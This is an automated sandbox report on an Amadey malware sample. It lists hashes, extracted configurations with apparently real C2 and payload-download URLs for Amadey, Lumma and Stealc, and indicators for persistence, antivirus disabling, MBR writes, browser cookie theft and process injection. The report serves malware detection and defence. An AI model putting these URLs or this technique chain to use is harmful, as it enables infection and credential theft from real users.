amadey | 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8

Resubmissions

28/03/2025, 18:26

250328-w3prbsztes 10

28/03/2025, 17:35

250328-v6e6mayzet 10

Analysis

max time kernel
90s
max time network
307s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 18:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Size

1.8MB
MD5

8480b3439f6f2fe71ff8136c8475a0e1
SHA1

8f787c424f7a1ac854d26b723008ea29d9f1b1aa
SHA256

37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8
SHA512

2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958
SSDEEP

49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr

Score

10^/10

amadey healer lumma stealc 092155 trump bootkit credential_access defense_evasion discovery dropper execution exploit persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://twxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral5/memory/12420-8144-0x0000000000690000-0x0000000000AD8000-memory.dmp	healer
behavioral5/memory/12420-8145-0x0000000000690000-0x0000000000AD8000-memory.dmp	healer
behavioral5/memory/12420-10147-0x0000000000690000-0x0000000000AD8000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5140 created 1044	5140	MSBuild.exe	51

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7a2ca10ed6.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1620	powershell.exe
14268	powershell.exe
10636	powershell.exe
21488	powershell.exe
8536	powershell.exe
9732	powershell.exe
11616	powershell.exe
8772	powershell.exe
13872	powershell.exe
5884	powershell.exe
22808	powershell.exe
17956	powershell.exe
9472	powershell.exe
11048	PowerShell.exe
2140	powershell.exe
1336	powershell.exe
9472	powershell.exe
7760	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 9 IoCs

flow	pid	Process
73	4204	rapes.exe
7	4204	rapes.exe
87	4204	rapes.exe
5	4588	svchost.exe
65	4204	rapes.exe
90	4204	rapes.exe
105	10720	futors.exe
29	4204	rapes.exe
3	4204	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\d5dbf3bd.sys	d9d42f7b.exe
File created	C:\Windows\System32\Drivers\klupd_d5dbf3bda_arkmon.sys	d9d42f7b.exe
File created	C:\Windows\System32\Drivers\klupd_d5dbf3bda_klbg.sys	d9d42f7b.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2740	takeown.exe
7056	icacls.exe

Sets service image path in registry 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_d5dbf3bda_arkmon\ImagePath = "System32\\Drivers\\klupd_d5dbf3bda_arkmon.sys"	d9d42f7b.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_d5dbf3bda_klbg\ImagePath = "System32\\Drivers\\klupd_d5dbf3bda_klbg.sys"	d9d42f7b.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_d5dbf3bda_klark\ImagePath = "System32\\Drivers\\klupd_d5dbf3bda_klark.sys"	d9d42f7b.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\JiYZ6IR_1820\ImagePath = "\\??\\C:\\Windows\\Temp\\JiYZ6IR_1820.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\d5dbf3bd\ImagePath = "System32\\Drivers\\d5dbf3bd.sys"	d9d42f7b.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 31 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
13164	msedge.exe
13156	chrome.exe
12436	msedge.exe
12988	chrome.exe
13080	msedge.exe
11664	msedge.exe
2032	chrome.exe
9016	msedge.exe
11852	msedge.exe
34528	chrome.exe
12572	chrome.exe
11876	msedge.exe
11720	msedge.exe
33312	chrome.exe
8448	msedge.exe
12620	chrome.exe
11668	chrome.exe
11516	msedge.exe
34888	chrome.exe
9352	chrome.exe
12920	msedge.exe
33200	chrome.exe
34576	chrome.exe
12520	msedge.exe
5528	msedge.exe
34516	chrome.exe
12528	chrome.exe
13196	chrome.exe
12492	chrome.exe
12460	msedge.exe
11760	msedge.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7a2ca10ed6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7a2ca10ed6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Deletes itself 1 IoCs

pid	Process
4744	w32tm.exe

Executes dropped EXE 34 IoCs

pid	Process
4204	rapes.exe
2716	u75a1_003.exe
3292	7IIl2eE.exe
1820	tzutil.exe
4744	w32tm.exe
1308	TbV75ZR.exe
5620	rapes.exe
7564	7a2ca10ed6.exe
8120	EPTwCQd.exe
8756	Rm3cVPI.exe
8960	xZRvIQ5.exe
9964	installer.exe
10460	amnew.exe
10720	futors.exe
11588	gron12321.exe
1364	75a55d39.exe
12704	d9d42f7b.exe
13364	v7942.exe
10172	bot.exe
10208	alex1dskfmdsf.exe
10388	javaruntime_service.exe
10592	javaplugin_update.exe
10676	javaservicew.exe
10844	javaplugin_platform.exe
10984	javaupdaterw.exe
476	javaplatform.exe
11244	javaupdater_update.exe
11684	javaplatform_update.exe
12308	javaservice_update.exe
12608	javaupdater_update.exe
480	javasupport_platform.exe
6084	javaruntime_service.exe
6296	javasupport_service.exe
6760	javasupport_update.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	7a2ca10ed6.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\d5dbf3bd.sys	d9d42f7b.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\d5dbf3bd.sys\ = "Driver"	d9d42f7b.exe

Loads dropped DLL 27 IoCs

pid	Process
9964	installer.exe
9964	installer.exe
9964	installer.exe
9964	installer.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2740	takeown.exe
7056	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\9bc6a6a9-4071-49a3-b7eb-e4077b3287f2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{b8e6e47f-a34d-4bf5-934a-244b2ce54ace}\\9bc6a6a9-4071-49a3-b7eb-e4077b3287f2.cmd\""	d9d42f7b.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	d9d42f7b.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral5/files/0x001a00000002b1e2-7662.dat	autoit_exe
behavioral5/files/0x002900000002b350-27483.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1248	tasklist.exe
2940	tasklist.exe
2720	tasklist.exe
18912	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
4204	rapes.exe
5620	rapes.exe
7564	7a2ca10ed6.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1308 set thread context of 5140	1308	TbV75ZR.exe	106
PID 8120 set thread context of 8188	8120	EPTwCQd.exe	116
PID 8960 set thread context of 9028	8960	xZRvIQ5.exe	119
PID 11588 set thread context of 11804	11588	gron12321.exe	130
PID 13364 set thread context of 4644	13364	v7942.exe	139
PID 10208 set thread context of 10424	10208	alex1dskfmdsf.exe	678

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	75a55d39.exe
File opened (read-only)	\??\VBoxMiniRdrDN	d9d42f7b.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
13168	sc.exe
4560	sc.exe
7748	sc.exe
788	sc.exe
10500	sc.exe
10616	sc.exe
14140	sc.exe
5344	sc.exe
10132	sc.exe
8708	sc.exe
8656	sc.exe
12880	sc.exe
13792	sc.exe
7744	sc.exe
7576	sc.exe
11824	sc.exe
4988	sc.exe
9372	sc.exe
10112	sc.exe
5376	sc.exe
7312	sc.exe
9180	sc.exe
8184	sc.exe
1336	sc.exe
10648	sc.exe
5748	sc.exe
836	sc.exe
9872	sc.exe
11820	sc.exe
7320	sc.exe
11036	sc.exe
7916	sc.exe
13880	sc.exe
13696	sc.exe
7024	sc.exe
12480	sc.exe
5228	sc.exe
4432	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
1036	5140	WerFault.exe	106
22844	9020	WerFault.exe	923
16884	23284	WerFault.exe	930
31312	12232	WerFault.exe	925
30916	31244	WerFault.exe	942
15096	132	WerFault.exe	919
19136	132	WerFault.exe	919
20404	6732	WerFault.exe	971
1696	19972	WerFault.exe	979
19376	21888	WerFault.exe	1025
12684	23240	WerFault.exe	1035
19344	6980	WerFault.exe	1042

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7a2ca10ed6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d9d42f7b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	75a55d39.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4576	PING.EXE
8112	PING.EXE
10756	PING.EXE
10896	PING.EXE
12696	PING.EXE
13088	PING.EXE
4812	PING.EXE
6448	PING.EXE
6628	PING.EXE
6756	PING.EXE
7072	PING.EXE
6452	PING.EXE
13512	PING.EXE
5980	PING.EXE
7032	PING.EXE
7492	PING.EXE
12584	PING.EXE
5936	PING.EXE
2936	PING.EXE
5340	PING.EXE
1528	PING.EXE
10380	PING.EXE
7004	PING.EXE
1152	PING.EXE
7460	PING.EXE
13884	PING.EXE
8716	PING.EXE
4088	PING.EXE
5688	PING.EXE
6160	PING.EXE
13840	PING.EXE
7428	PING.EXE
11484	PING.EXE
6220	PING.EXE
8988	PING.EXE
10108	PING.EXE
948	PING.EXE
3948	PING.EXE
14128	PING.EXE
6372	PING.EXE
7116	PING.EXE
7276	PING.EXE
8528	PING.EXE
6368	PING.EXE
5964	PING.EXE
9136	PING.EXE
13912	PING.EXE
12904	PING.EXE
5792	PING.EXE
6344	PING.EXE
6420	PING.EXE
6712	PING.EXE
6576	PING.EXE
5440	PING.EXE
13612	PING.EXE
14032	PING.EXE
1528	PING.EXE
7204	PING.EXE
5548	PING.EXE
5692	PING.EXE
6288	PING.EXE
5580	PING.EXE
5984	PING.EXE
6876	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
4128	timeout.exe
31152	timeout.exe
9472	timeout.exe
30360	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2776	taskkill.exe
3296	taskkill.exe
8656	taskkill.exe
7544	taskkill.exe
10712	taskkill.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

T1112

pid	Process
8452	reg.exe
13640	reg.exe
10576	reg.exe
6568	reg.exe
23788	reg.exe
8392	reg.exe
9576	reg.exe
11412	reg.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
14288	PING.EXE
2864	PING.EXE
10380	PING.EXE
9644	PING.EXE
7292	PING.EXE
6140	PING.EXE
6984	PING.EXE
11288	PING.EXE
2084	PING.EXE
10424	PING.EXE
13024	PING.EXE
6160	PING.EXE
5200	PING.EXE
8344	PING.EXE
2612	PING.EXE
11312	PING.EXE
11492	PING.EXE
1152	PING.EXE
7840	PING.EXE
8484	PING.EXE
5340	PING.EXE
6484	PING.EXE
4576	PING.EXE
12584	PING.EXE
5984	PING.EXE
5232	PING.EXE
2740	PING.EXE
7892	PING.EXE
6600	PING.EXE
6876	PING.EXE
5156	PING.EXE
5616	PING.EXE
6756	PING.EXE
7556	PING.EXE
3980	PING.EXE
10888	PING.EXE
10424	PING.EXE
12196	PING.EXE
7576	PING.EXE
8528	PING.EXE
9920	PING.EXE
6480	PING.EXE
7784	PING.EXE
9980	PING.EXE
13884	PING.EXE
460	PING.EXE
6044	PING.EXE
7132	PING.EXE
7276	PING.EXE
10044	PING.EXE
9444	PING.EXE
7104	PING.EXE
536	PING.EXE
6712	PING.EXE
8444	PING.EXE
9928	PING.EXE
9520	PING.EXE
12904	PING.EXE
5152	PING.EXE
13512	PING.EXE
8112	PING.EXE
9772	PING.EXE
7324	PING.EXE
8056	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
11584	schtasks.exe
18480	schtasks.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
4204	rapes.exe
4204	rapes.exe
1620	powershell.exe
1620	powershell.exe
14268	powershell.exe
14268	powershell.exe
5620	rapes.exe
5620	rapes.exe
5140	MSBuild.exe
5140	MSBuild.exe
5140	MSBuild.exe
5140	MSBuild.exe
6232	svchost.exe
6232	svchost.exe
6232	svchost.exe
6232	svchost.exe
6796	powershell.exe
6796	powershell.exe
7564	7a2ca10ed6.exe
7564	7a2ca10ed6.exe
7564	7a2ca10ed6.exe
7564	7a2ca10ed6.exe
7564	7a2ca10ed6.exe
7564	7a2ca10ed6.exe
8188	MSBuild.exe
8188	MSBuild.exe
8188	MSBuild.exe
8188	MSBuild.exe
9028	MSBuild.exe
9028	MSBuild.exe
9028	MSBuild.exe
9028	MSBuild.exe
8756	Rm3cVPI.exe
8756	Rm3cVPI.exe
8756	Rm3cVPI.exe
8756	Rm3cVPI.exe
9472	powershell.exe
9472	powershell.exe
11804	MSBuild.exe
11804	MSBuild.exe
11804	MSBuild.exe
11804	MSBuild.exe
4644	MSBuild.exe
4644	MSBuild.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
1820	tzutil.exe
12704	d9d42f7b.exe
12704	d9d42f7b.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2716	u75a1_003.exe
2716	u75a1_003.exe
2716	u75a1_003.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	1248	tasklist.exe
Token: SeDebugPrivilege	2940	tasklist.exe
Token: SeDebugPrivilege	14268	powershell.exe
Token: SeLoadDriverPrivilege	1820	tzutil.exe
Token: SeDebugPrivilege	6796	powershell.exe
Token: SeDebugPrivilege	9472	powershell.exe
Token: SeDebugPrivilege	12704	d9d42f7b.exe
Token: SeBackupPrivilege	12704	d9d42f7b.exe
Token: SeRestorePrivilege	12704	d9d42f7b.exe
Token: SeLoadDriverPrivilege	12704	d9d42f7b.exe
Token: SeShutdownPrivilege	12704	d9d42f7b.exe
Token: SeSystemEnvironmentPrivilege	12704	d9d42f7b.exe
Token: SeSecurityPrivilege	12704	d9d42f7b.exe
Token: SeBackupPrivilege	12704	d9d42f7b.exe
Token: SeRestorePrivilege	12704	d9d42f7b.exe
Token: SeDebugPrivilege	12704	d9d42f7b.exe
Token: SeSystemEnvironmentPrivilege	12704	d9d42f7b.exe
Token: SeSecurityPrivilege	12704	d9d42f7b.exe
Token: SeCreatePermanentPrivilege	12704	d9d42f7b.exe
Token: SeShutdownPrivilege	12704	d9d42f7b.exe
Token: SeLoadDriverPrivilege	12704	d9d42f7b.exe
Token: SeIncreaseQuotaPrivilege	12704	d9d42f7b.exe
Token: SeSecurityPrivilege	12704	d9d42f7b.exe
Token: SeSystemProfilePrivilege	12704	d9d42f7b.exe
Token: SeDebugPrivilege	12704	d9d42f7b.exe
Token: SeMachineAccountPrivilege	12704	d9d42f7b.exe
Token: SeCreateTokenPrivilege	12704	d9d42f7b.exe
Token: SeAssignPrimaryTokenPrivilege	12704	d9d42f7b.exe
Token: SeTcbPrivilege	12704	d9d42f7b.exe
Token: SeAuditPrivilege	12704	d9d42f7b.exe
Token: SeSystemEnvironmentPrivilege	12704	d9d42f7b.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1352 wrote to memory of 4204	1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	82
PID 1352 wrote to memory of 4204	1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	82
PID 1352 wrote to memory of 4204	1352	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	82
PID 4204 wrote to memory of 2716	4204	rapes.exe	83
PID 4204 wrote to memory of 2716	4204	rapes.exe	83
PID 4204 wrote to memory of 2716	4204	rapes.exe	83
PID 2716 wrote to memory of 2520	2716	u75a1_003.exe	84
PID 2716 wrote to memory of 2520	2716	u75a1_003.exe	84
PID 2716 wrote to memory of 4588	2716	u75a1_003.exe	86
PID 2716 wrote to memory of 4588	2716	u75a1_003.exe	86
PID 2520 wrote to memory of 1620	2520	cmd.exe	87
PID 2520 wrote to memory of 1620	2520	cmd.exe	87
PID 4204 wrote to memory of 3292	4204	rapes.exe	92
PID 4204 wrote to memory of 3292	4204	rapes.exe	92
PID 4204 wrote to memory of 3292	4204	rapes.exe	92
PID 3292 wrote to memory of 1700	3292	7IIl2eE.exe	93
PID 3292 wrote to memory of 1700	3292	7IIl2eE.exe	93
PID 3292 wrote to memory of 1700	3292	7IIl2eE.exe	93
PID 1700 wrote to memory of 1248	1700	CMD.exe	95
PID 1700 wrote to memory of 1248	1700	CMD.exe	95
PID 1700 wrote to memory of 1248	1700	CMD.exe	95
PID 1700 wrote to memory of 1056	1700	CMD.exe	96
PID 1700 wrote to memory of 1056	1700	CMD.exe	96
PID 1700 wrote to memory of 1056	1700	CMD.exe	96
PID 1700 wrote to memory of 2940	1700	CMD.exe	98
PID 1700 wrote to memory of 2940	1700	CMD.exe	98
PID 1700 wrote to memory of 2940	1700	CMD.exe	98
PID 1700 wrote to memory of 4900	1700	CMD.exe	99
PID 1700 wrote to memory of 4900	1700	CMD.exe	99
PID 1700 wrote to memory of 4900	1700	CMD.exe	99
PID 4588 wrote to memory of 1820	4588	svchost.exe	100
PID 4588 wrote to memory of 1820	4588	svchost.exe	100
PID 4588 wrote to memory of 4744	4588	svchost.exe	101
PID 4588 wrote to memory of 4744	4588	svchost.exe	101
PID 1820 wrote to memory of 14268	1820	tzutil.exe	102
PID 1820 wrote to memory of 14268	1820	tzutil.exe	102
